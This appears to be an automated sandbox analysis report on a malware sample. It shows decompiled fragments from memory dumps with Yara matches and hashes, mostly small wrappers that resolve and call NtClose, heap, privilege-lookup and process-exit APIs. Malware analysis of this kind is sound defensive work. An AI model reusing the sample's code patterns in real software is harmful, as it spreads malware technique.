                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E004182DA(void* __eax, void* __ecx, intOrPtr _a8, void* _a12) {
                                                                              				long _t12;
                                                                              				void* _t18;
                                                                              
                                                                              				_t9 = _a8;
                                                                              				_t5 = _t9 + 0x10; // 0x300
                                                                              				_t6 = _t9 + 0xc50; // 0x409733
                                                                              				E00418DB0(_t18, _a8, _t6,  *_t5, 0, 0x2c);
                                                                              				_t12 = NtClose(_a12); // executed
                                                                              				return _t12;
                                                                              			}

                                                                              APIs
                                                                              • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 4c3c248844b78758760fbdb0a201d5043adc8340b02b26c0bcbcbf2afb23922d
                                                                              • Instruction ID: 1f3b181c670607d11befed56111bda4796acd929acf14a18ec04b659a5850319
                                                                              • Opcode Fuzzy Hash: 4c3c248844b78758760fbdb0a201d5043adc8340b02b26c0bcbcbf2afb23922d
                                                                              • Instruction Fuzzy Hash: C5E026712002006FD710DBA88C45FDB3B54DF44220F20419DFA5C9B2C2C531E5428294
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E004182E0(intOrPtr _a4, void* _a8) {
                                                                              				long _t8;
                                                                              				void* _t11;
                                                                              
                                                                              				_t5 = _a4;
                                                                              				_t2 = _t5 + 0x10; // 0x300
                                                                              				_t3 = _t5 + 0xc50; // 0x409733
                                                                              				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                              				_t8 = NtClose(_a8); // executed
                                                                              				return _t8;
                                                                              			}

                                                                              APIs
                                                                              • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                              • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                              • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                                                                              • Instruction ID: 3679f56db154f20b125b2ee624a088cf27215c8a369a8f6811c3a0c659b85df9
                                                                              • Opcode Fuzzy Hash: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                                                                              • Instruction Fuzzy Hash: 3990026160100503D21271694404616000AE7D0382F91C032A5014555ECA7589D6F171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                                                                              • Instruction ID: 21c54deca697b2ded1517e8e1738f7315810da786e900ad234c2aa2cb91c91dc
                                                                              • Opcode Fuzzy Hash: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                                                                              • Instruction Fuzzy Hash: DA90027120100413D222616945047070009E7D0382F91C422A4414558D96A68996F161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                                                                              • Instruction ID: 41887b8759142fbb3d7f1feb8a98236d473b17719def4235c2a79c670be888c7
                                                                              • Opcode Fuzzy Hash: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                                                                              • Instruction Fuzzy Hash: 17900261242041535656B16944045074006F7E0382791C022A5404950C8576989AE661
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                                                                              • Instruction ID: 1feb496b191fc441b15c9f44a378969dd7f4dd2a3fa43bc79c875e267a888c90
                                                                              • Opcode Fuzzy Hash: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                                                                              • Instruction Fuzzy Hash: 3B9002A134100443D21161694414B060005E7E1342F51C025E5054554D8669CC96B166
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                                                                              • Instruction ID: cd18590575c2b322f46f28179e48b638b62d154e3f57e717e1138a8122dace73
                                                                              • Opcode Fuzzy Hash: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                                                                              • Instruction Fuzzy Hash: 2B9002B120100403D251716944047460005E7D0342F51C021A9054554E86A98DD9B6A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                                                                              • Instruction ID: 395bf6263286ad70b641d49cb16516253b58af2615c1288a40097d6e6d3034c8
                                                                              • Opcode Fuzzy Hash: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                                                                              • Instruction Fuzzy Hash: C3900261601000434251717988449064005FBE1352751C131A4988550D85A988A9A6A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                                                                              • Instruction ID: a6f67a8277a3b3be8b89b917850b13e78702fe5dd5bedc71adf87a0afe52c33f
                                                                              • Opcode Fuzzy Hash: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                                                                              • Instruction Fuzzy Hash: 8490027120140403D2116169481470B0005E7D0343F51C021A5154555D86758895B5B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                                                                              • Instruction ID: 64d2cfaf13f9309bcd7403859deaf896cc2873968d7599671b0a295e5d50db3c
                                                                              • Opcode Fuzzy Hash: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                                                                              • Instruction Fuzzy Hash: FC90026121180043D31165794C14B070005E7D0343F51C125A4144554CC96588A5A561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                                                                              • Instruction ID: 08c33894a5ed7cb2586842ca04486c4597f6e0c3905499bcde100bcd11c8e5f2
                                                                              • Opcode Fuzzy Hash: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                                                                              • Instruction Fuzzy Hash: 0D9002A120200003421671694414616400AE7E0342B51C031E5004590DC57588D5B165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                                                                              • Instruction ID: 1315aa69fdc5ae92524b7a957cf78082d5d3c7872c89ceafb40b3329d7236b15
                                                                              • Opcode Fuzzy Hash: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                                                                              • Instruction Fuzzy Hash: 75900265211000030216A56907045070046E7D5392351C031F5005550CD67188A5A161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                                                                              • Instruction ID: f1994b6a4f452d4f91f2f1e37c547d66f4cd1f9836b374957a5211878604265d
                                                                              • Opcode Fuzzy Hash: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                                                                              • Instruction Fuzzy Hash: 0890027120108803D2216169840474A0005E7D0342F55C421A8414658D86E588D5B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                                                                              • Instruction ID: 82818c37d7a7e9e8cb6d625da2237b27d33e1dddfe8bbaa70537b02e9c407086
                                                                              • Opcode Fuzzy Hash: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                                                                              • Instruction Fuzzy Hash: 3F90027120100803D2917169440464A0005E7D1342F91C025A4015654DCA658A9DB7E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                                                                              • Instruction ID: 39b11731bdff199837e062ce116313473b0146bb55da1fdd5054dad37b832a5f
                                                                              • Opcode Fuzzy Hash: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                                                                              • Instruction Fuzzy Hash: 7690026130100003D251716954186064005F7E1342F51D021E4404554CD965889AA262
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                              • Instruction ID: f455264d3e230fdaa5da93997a6747d008b443e26f4d11623bc6616487098b57
                                                                              • Opcode Fuzzy Hash: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                              • Instruction Fuzzy Hash: 2890026921300003D2917169540860A0005E7D1343F91D425A4005558CC96588ADA361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                              • Instruction ID: 5648b87f03e205912434b748b2a8678bc994c3f78523e6e99c13484dcec24f85
                                                                              • Opcode Fuzzy Hash: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                              • Instruction Fuzzy Hash: A190027131114403D221616984047060005E7D1342F51C421A4814558D86E588D5B162
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                              • Instruction ID: ce6b1a714e862e6b33b3a65d62e18ad929d5c69ff1b880c89aa1bdfe96938745
                                                                              • Opcode Fuzzy Hash: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                              • Instruction Fuzzy Hash: 0F90027120100403D21165A954086460005E7E0342F51D021A9014555EC6B588D5B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                              • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                              • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                              • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 82%
                                                                              			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                              				char _v67;
                                                                              				char _v68;
                                                                              				void* _t12;
                                                                              				intOrPtr* _t13;
                                                                              				int _t14;
                                                                              				long _t21;
                                                                              				intOrPtr* _t25;
                                                                              				void* _t26;
                                                                              				void* _t30;
                                                                              				int _t32; // return value of PostThreadMessageW, reused as the flags argument to E00409270 (missing from the decompiler output)
                                                                              
                                                                              				_t30 = __eflags;
                                                                              				_v68 = 0;
                                                                              				E00419D10( &_v67, 0, 0x3f);
                                                                              				E0041A8F0( &_v68, 3);
                                                                              				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                              				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                              				_t25 = _t13;
                                                                              				if(_t25 != 0) {
                                                                              					_t21 = _a8;
                                                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                              					_t32 = _t14;
                                                                              					if(_t14 == 0) {
                                                                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                              					}
                                                                              					return _t14;
                                                                              				}
                                                                              				return _t13;
                                                                              			}

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                              • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                              • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                              • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 43%
                                                                              			E004184B2(void* __eax, void* __edi, intOrPtr _a9, void* _a13, long _a17, void* _a21) {
                                                                              				char _t12;
                                                                              				void* _t18;
                                                                              
                                                                              				asm("sahf");
                                                                              				_pop(_t19);
                                                                              				_t18 = __edi - 1;
                                                                              				asm("insb");
                                                                              				asm("fstp9 st2");
                                                                              				asm("adc al, 0x55");
                                                                              				_t9 = _a9;
                                                                              				_t3 = _t9 + 0xc74; // 0xc74
                                                                              				E00418DB0(_t18, _a9, _t3,  *((intOrPtr*)(_a9 + 0x10)), 0, 0x35);
                                                                              				_t12 = RtlFreeHeap(_a13, _a17, _a21); // executed
                                                                              				return _t12;
                                                                              			}
Instruction addresses (this listing starts mid-function at 0x004184b2, which is why the first instructions decode as junk; from 0x004184cf it overlaps E004184C0 below and the RtlFreeHeap call at 004184ED is the same call site): 0x004184b2, 0x004184b3, 0x004184b5, 0x004184b6, 0x004184bc, 0x004184be, 0x004184c3, 0x004184cf, 0x004184d7, 0x004184ed, 0x004184f1

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: 3c7b59bb92cd6b367a20bf088987b4b6c3345a20f53722230445991aabc67e08
                                                                              • Instruction ID: e0bd7550836f63ed215aa82201fbf28079057d129d88497f49e6d8f7befc4c46
                                                                              • Opcode Fuzzy Hash: 3c7b59bb92cd6b367a20bf088987b4b6c3345a20f53722230445991aabc67e08
                                                                              • Instruction Fuzzy Hash: 9AE092712102146BD718EF58EC85EE777A9EF89764F108A49FE0D5B241C930ED118AE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 53%
                                                                              			E00418611(void* __eax, void* __ebx, void* __ecx, signed int __edi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                                                                              				intOrPtr _v0;
                                                                              				int _t14;
                                                                              
                                                                              				asm("les edx, [ebx-0x29b0d21d]");
                                                                              				asm("lodsd");
                                                                              				asm("pushfd");
                                                                              				 *(__ebx - 0x74aa04c4) =  *(__ebx - 0x74aa04c4) & __edi;
                                                                              				_t11 = _v0;
                                                                              				E00418DB0(__edi, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
                                                                              				_t14 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                                                                              				return _t14;
                                                                              			}
Instruction addresses (this listing starts mid-function at 0x00418611, which is why the first instructions decode as junk; from 0x0041863a it overlaps E00418620 below and the LookupPrivilegeValueW call at 00418650 is the same call site): 0x00418611, 0x00418617, 0x00418619, 0x0041861c, 0x00418623, 0x0041863a, 0x00418650, 0x00418654

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: 4b49e43f48961f35738517ac2e599b414f583d23ca9c9de1c7edbf935a67b0cc
                                                                              • Instruction ID: 58228a238782b9b3764d277eba2e113db830a1d013cdae8c0cb904c5590fb8ad
                                                                              • Opcode Fuzzy Hash: 4b49e43f48961f35738517ac2e599b414f583d23ca9c9de1c7edbf935a67b0cc
                                                                              • Instruction Fuzzy Hash: D6F039B1600204AFDB14DF55CC85EEB37A9EF99310F1181A9F90D9B282DA35A8168BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                              				char _t10;
                                                                              				void* _t15;
                                                                              
                                                                              				_t3 = _a4 + 0xc74; // 0xc74
                                                                              				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                              				return _t10;
                                                                              			}
Instruction addresses: 0x004184cf, 0x004184d7, 0x004184ed, 0x004184f1

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                              • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                              • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                              				void* _t10;
                                                                              				void* _t15;
                                                                              
                                                                              				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                              				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                              				return _t10;
                                                                              			}
Instruction addresses: 0x00418497, 0x004184ad, 0x004184b1

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                              • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                              • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                              				int _t10;
                                                                              				void* _t15;
                                                                              
                                                                              				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                              				return _t10;
                                                                              			}
Instruction addresses: 0x0041863a, 0x00418650, 0x00418654

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                              • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                              • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00418500(intOrPtr _a4, int _a8) {
                                                                              				void* _t10;
                                                                              
                                                                              				_t5 = _a4;
                                                                              				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                              				ExitProcess(_a8);
                                                                              			}
Instruction addresses: 0x00418503, 0x0041851a, 0x00418528

                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                              • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                              • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                              • Instruction ID: 3611c612406d18cddccccd86054bbce9a335fcd3a835415094ae52f60009255c
                                                                              • Opcode Fuzzy Hash: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                              • Instruction Fuzzy Hash: 40B09B719424C5C6D711D77046087177900B7D0741F17C065D1020641A4778C4D5F5B6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
